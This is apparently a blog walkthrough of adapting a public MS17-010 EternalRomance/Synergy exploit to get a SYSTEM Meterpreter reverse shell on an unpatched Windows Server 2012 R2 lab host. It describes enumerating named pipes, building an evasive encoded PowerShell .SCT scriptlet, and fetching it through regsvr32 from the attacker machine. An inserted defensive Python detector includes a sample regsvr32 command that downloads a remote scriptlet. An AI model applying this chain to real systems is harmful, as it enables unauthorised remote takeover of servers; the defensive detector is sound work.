ETERNALROMANCE/SYNERGY EXPLOITATION ON WINDOWS 2012R2

The MS17-010 vulnerability, patched by Microsoft, affects Windows 7 through Windows Server 2016. The EternalRomance/EternalSynergy exploits published by the Shadow Brokers are very unstable when tried against Windows Server 2012 and 2016, causing a BSOD on the target machine 100% of the time.

This is not a comprehensive article, but we will demonstrate how we can leverage sleepya's code and make minimal code changes in order to obtain a privileged Windows Meterpreter reverse shell on the target system.

Virtual Environment & prerequisites

Kali Ubuntu Machine  IP address 192.168.1.14

Python v.2.7

Ps1Encode: used to generate Metasploit-type PowerShell reverse shells

https://github.com/CroweCybersecurity/ps1encode

Windows Server 2012 R2 target IP   192.168.1.30 ( Not patched with MS17_010 )

OK, so without further ado, let's compromise the Windows Server 2012 R2 machine.

The exploit has been published by sleepya: https://www.exploit-db.com/exploits/42315/. The exploit works properly without any modification: if we execute it against the Windows Server 2012 R2 machine, it will create the file C:\pawned.txt on the target disk.

You might already be thinking, "Hm, but that doesn't give me a Meterpreter shell on the target box." That's very much true, but we will make a couple of modifications to get the desired shell.

We have now enabled the guest account on our Windows Server 2012 R2 machine.

Figure 1: We set the authentication to “guest” with minimal privileges

Parameters

The exploit code requires two parameters: the target IP address (Windows Server 2012 R2 in our case) and the pipe name. Windows named pipes are not in the scope of this article. The SMB protocol supports three different types of shares: File, a file share which is a directory tree; Print, a print share which gives access to print shares on the server; and Pipe, inter-process communication that uses a FIFO (first in, first out) model, a.k.a. named pipes.

What other pipe types can you potentially exploit on a Windows server box?

  • netlogon, samr, lsarpc, spoolss, browser

OK, it's very straightforward to identify which named pipes are available on a target server. I wrote a Python script which compares the UID to identify if the named pipe exists; if so, it then just checks whether access is allowed or denied.

Script to identify named pipes on the target Windows Server 2012 R2

Figure 2: The script identifies the named pipes Browser, Spoolss, Netlogon, LSARPC, SAMR

If we execute the exploit, it will create c:\namlook.txt on the target.

Figure 3: Executed code without a reverse shell created c:\namlook.txt

Code snippet that creates namlook.txt on the target server

Figure 4: The CreateFile function adds pwned.txt on the target server, but there is no reverse shell code.


Exploit Modification/Reverse shell

Executing code with our SCT reverse shell code (SCT file extension: Windows Script Component). This is an effective approach to evade security controls, using the SCT extension with embedded PowerShell reverse shell code. We will use ps1encode, which allows us to generate encoded Metasploit code in several formats.

We can download ps1encode from GitHub: https://github.com/CroweCybersecurity/ps1encode

SCT Reverse Shell code

Figure 5: Reverse shell code, windows/meterpreter/reverse_tcp

Armed with the .SCT reverse shell file, we simply move it to our Python web server on the Kali machine (/var/www/html) or to any machine that can be reached from the target server. The idea is that, when we execute the exploit against the target server, it uses regsvr32 (Microsoft Register Server), a command-line utility for registering and unregistering DLLs in the Windows registry.

Reverse shell code

Figure 6: We modified the code to execute our malicious reverse shell .SCT file on our target machine
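The defender's view of this step, as an added example that is not part of the original post: a small detector for regsvr32 loading a remote scriptlet, run over constructed Sysmon-style events (EID 1 process creation, EID 3 network connection). The host name, the file name `shell.sct` and the sample command lines are assumptions made for illustration; only the 192.168.1.14 address comes from the lab setup above.

```python
import re

# Constructed sample events shaped like Sysmon records (EID 1 = process
# creation, EID 3 = network connection). They are not from the original post.
SAMPLE_EVENTS = [
    {"EventID": 1, "Host": "WIN2012R2", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\msxml6.dll"},
    {"EventID": 1, "Host": "WIN2012R2", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /s /i:http://192.168.1.14/shell.sct scrobj.dll"},
    {"EventID": 3, "Host": "WIN2012R2", "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "DestinationIp": "192.168.1.14", "DestinationPort": 80},
    {"EventID": 3, "Host": "WIN2012R2", "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "192.168.1.1", "DestinationPort": 53},
]

URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"']+", re.I)
SCT_RE = re.compile(r"\.sct\b", re.I)

def is_regsvr32(image):
    """True when the image path's file name is regsvr32.exe (any directory, any case)."""
    return image.replace("/", "\\").lower().rsplit("\\", 1)[-1] == "regsvr32.exe"

def score_event(event):
    """Return the list of indicators this event shows; empty means benign."""
    if not is_regsvr32(event.get("Image", "")):
        return []
    reasons = []
    if event.get("EventID") == 1:
        cmd = event.get("CommandLine", "")
        if URL_RE.search(cmd):
            reasons.append("url-in-commandline")   # regsvr32 rarely needs a URL
        if SCT_RE.search(cmd):
            reasons.append("sct-reference")        # scriptlet file named directly
        if "scrobj.dll" in cmd.lower():
            reasons.append("scrobj-dll")           # script component runtime
    elif event.get("EventID") == 3:
        reasons.append("regsvr32-network-connection")
    return reasons

def detect(events):
    """Return (event, reasons) pairs for every event with at least one indicator."""
    return [(e, r) for e in events for r in [score_event(e)] if r]

if __name__ == "__main__":
    for event, reasons in detect(SAMPLE_EVENTS):
        print(event["Host"], event["EventID"], ",".join(reasons))
```

The network-connection rule catches the fetch even when command-line logging is unavailable, since regsvr32 has little legitimate reason to open outbound connections.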

Meterpreter session

We have now configured Metasploit's exploit/multi/handler to receive the reverse shell.

Figure 7: Handler configured with windows/meterpreter/reverse_tcp

After executing the modified MS17_010 exploit, we get a clean Meterpreter reverse shell.

Figure 8: sysinfo with NT/Authority priv ….

 

Go and patch please … https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 
